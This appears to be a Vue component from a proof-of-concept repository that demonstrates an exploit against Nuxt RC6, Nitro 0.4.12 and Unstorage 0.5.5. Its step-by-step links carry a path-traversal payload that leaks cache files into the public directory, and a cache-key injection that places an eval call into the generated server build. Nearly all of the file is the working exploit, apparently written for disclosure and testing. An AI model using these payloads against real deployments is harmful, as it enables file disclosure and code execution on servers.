-
Notifications
You must be signed in to change notification settings - Fork 0
/
app.vue
45 lines (39 loc) · 1.2 KB
/
app.vue
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<template>
<div>
Nuxt RC6, Nitro 0.4.12, Unstorage 0.5.5 Exploit
<ol>
<li>
<NuxtLink to="/api/bryce" target="_blank"
>Try this link, you can see my name!</NuxtLink
>. If you explore the .nuxt/cache folder you'll find the cached file.
</li>
<li>
<NuxtLink to="/api/..:..:..:..:..:..:public:test" target="_blank"
>Try this link.</NuxtLink
>
then
<NuxtLink to="/test.json" target="_blank">this link.</NuxtLink> You've
leaked a cache file!
</li>
<li>
<!-- We need to use :server:assets because Nuxt's assets directory is special.-->
<NuxtLink
to="/api/..:..:..:..:..:..:server:assets:'+eval('console.log(`hacked!`);`blah`')+'"
target="_blank"
>Try this link.</NuxtLink
>
then run a production build (make sure you're on linux).
</li>
<li>
Have a look at the ./output/server/chunks/nitro/node-server.mjs file.
Look for "const _assets = {"
</li>
<li>Run your new build!</li>
</ol>
</div>
</template>
<script setup>
const demo = async () => {
const { data } = await useFetch('/api/cached');
};
</script>